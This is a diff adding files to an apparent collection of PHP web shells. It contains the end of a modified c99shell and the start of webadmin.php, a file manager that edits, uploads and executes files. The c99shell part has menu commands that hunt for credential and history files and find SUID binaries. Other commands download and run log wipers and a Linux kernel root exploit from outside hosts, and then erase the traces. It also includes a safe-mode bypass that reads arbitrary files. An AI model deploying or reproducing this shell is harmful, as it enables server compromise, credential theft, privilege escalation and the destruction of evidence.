+             <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory
+             <OPTION VALUE="find / -type f -name "config*">Find config* files
+             <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory
+              <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files
+             <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory
+             <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files
+	    	 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory
+			 <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files
+			 <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory
+			 <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files
+			 <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory
+			 <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files
+			 <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory
+			 <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files
+			<OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory
+			 <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files
+			<OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory
+			<OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
+			<OPTION VALUE="">                   
+		<OPTION VALUE="#"> [Directory Malipulation]
+		<OPTION VALUE="">                  
+		<OPTION VALUE="pwd">List your current directory
+		<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable?
+		<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="">                   
+<OPTION VALUE="#"> [Miscellaneous Commands]
+<OPTION VALUE="">                   
+           <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable)
+  <OPTION VALUE="uname -a">Kernel version
+           <OPTION VALUE="w">Logged in users
+           <OPTION VALUE="lastlog">Last users to connect
+           <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+           <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords
+            <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo
+             <OPTION VALUE="netstat -atup | grep IST">Open ports    
+			 <OPTION VALUE="">                                     
+            <OPTION VALUE="#"> [Application Verification]
+			<OPTION VALUE="">                   
+            <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera)
+            <OPTION VALUE="locate gcc">Check For GCC
+			<OPTION VALUE="">                   
+		   <OPTION VALUE="#"> [Log Cleaners]
+		   <OPTION VALUE="">                   
+                    <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3)
+                    <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3)
+                    <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3)
+                    <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces
+                   <OPTION VALUE="">  
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish)
+                    <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish)
+                     <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish)
+                    <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces
+                   <OPTION VALUE=""> 
+                   <OPTION VALUE="#"> [Root Exploits]
+		   <OPTION VALUE=""> 
+                    <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1)
+                   <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2)
+                   <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3)
+                   <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4)
+                   <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces
+                    </SELECT>
+        
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute"></div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+  <center><br/><b> Kernel Information </b>
+<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80>
+&nbsp;
+<input type=submit value="Search" name=btnG></form>
+</center>
+    </td>
+</tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong>PHP Safe-Mode Bypass (Read Files)    </strong></div>
+    <br>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <strong>PHP Safe-Mode Bypass (List Directories)</strong>:     
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Search</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Upload</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong>Create Directory
+  </strong>
+  <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong>Create File </strong>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>Enter Directory </b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <b>Access File</b>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table>
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/xakep-shells/PHP/webadmin.php.php.txt b/xakep-shells/PHP/webadmin.php.php.txt
new file mode 100644
index 0000000..9e0928e
--- /dev/null
+++ b/xakep-shells/PHP/webadmin.php.php.txt
@@ -0,0 +1,2491 @@
+<?php
+/*
+ * webadmin.php - a simple Web-based file manager
+ * Copyright (C) 2004  Daniel Wacker <daniel.wacker@web.de>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+ * -------------------------------------------------------------------------
+ * While using this script, do NOT navigate with your browser's back and
+ * forward buttons! Always open files in a new browser tab!
+ * -------------------------------------------------------------------------
+ *
+ * This is Version 0.9, revision 9
+ * =========================================================================
+ *
+ * Changes of revision 9
+ * <daniel.wacker@web.de>
+ *    added workaround for directory listing, if lstat() is disabled
+ *    fixed permisson of uploaded files (thanks to Stephan Duffner)
+ *
+ * Changes of revision 8
+ * <okankan@stud.sdu.edu.tr>
+ *    added Turkish translation
+ * <j@kub.cz>
+ *    added Czech translation
+ * <daniel.wacker@web.de>
+ *    improved charset handling
+ *
+ * Changes of revision 7
+ * <szuniga@vtr.net>
+ *    added Spanish translation
+ * <lars@soelgaard.net>
+ *    added Danish translation
+ * <daniel.wacker@web.de>
+ *    improved rename dialog
+ *
+ * Changes of revision 6
+ * <nederkoorn@tiscali.nl>
+ *    added Dutch translation
+ *
+ * Changes of revision 5
+ * <daniel.wacker@web.de>
+ *    added language auto select
+ *    fixed symlinks in directory listing
+ *    removed word-wrap in edit textarea
+ *
+ * Changes of revision 4
+ * <daloan@guideo.fr>
+ *    added French translation
+ * <anders@wiik.cc>
+ *    added Swedish translation
+ *
+ * Changes of revision 3
+ * <nzunta@gabriele-erba.it>
+ *    improved Italian translation
+ *
+ * Changes of revision 2
+ * <daniel.wacker@web.de>
+ *    got images work in some old browsers
+ *    fixed creation of directories
+ *    fixed files deletion
+ *    improved path handling
+ *    added missing word 'not_created'
+ * <till@tuxen.de>
+ *    improved human readability of file sizes
+ * <nzunta@gabriele-erba.it>
+ *    added Italian translation
+ *
+ * Changes of revision 1
+ * <daniel.wacker@web.de>
+ *    webadmin.php completely rewritten:
+ *    - clean XHTML/CSS output
+ *    - several files selectable
+ *    - support for windows servers
+ *    - no more treeview, because
+ *      - webadmin.php is a >simple< file manager
+ *      - performance problems (too much additional code)
+ *      - I don't like: frames, java-script, to reload after every treeview-click
+ *    - execution of shell scripts
+ *    - introduced revision numbers
+ *
+/* ------------------------------------------------------------------------- */
+
+/* Your language:
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'nl' - Dutch
+ * 'se' - Swedish
+ * 'sp' - Spanish
+ * 'dk' - Danish
+ * 'tr' - Turkish
+ * 'cs' - Czech
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of output:
+ * possible values are described in the charset table at
+ * http://www.php.net/manual/en/function.htmlentities.php
+ * 'auto' - use the same charset as the words of my language are encoded
+ */
+$site_charset = 'auto';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the edit textarea
+ */
+$editcols = 80;
+$editrows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (remove # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if (!function_exists('lstat')) {
+	function lstat ($filename) {
+		return stat($filename);
+	}
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+if ($site_charset == 'auto') {
+	$site_charset = $word_charset;
+}
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'download':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
+		@chmod($dest, $filepermission);
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			edit($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'delete':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_deleted', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('deleted', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_delete') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'rename':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (!@file_exists($dest) && @rename($file, $dest)) {
+			listing_page(notice('renamed', $file, $dest));
+		} else {
+			listing_page(error('not_renamed', $file, $dest));
+		}
+
+	} else {
+
+		$name = basename($file);
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="rename" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('rename_file') . '</b>
+	<p>' . html($file) . '</p>
+	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
+	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
+	<hr />
+	<input type="submit" value="' . word('rename') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'move':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @rename($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_moved', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('moved', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('move_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('destination') . ':
+	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('move') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'copy':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @copy($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('copy_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('destination') . ':
+	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('copy') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('destination') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'edit':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			edit($file);
+		} else {
+			listing_page(error('not_edited', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
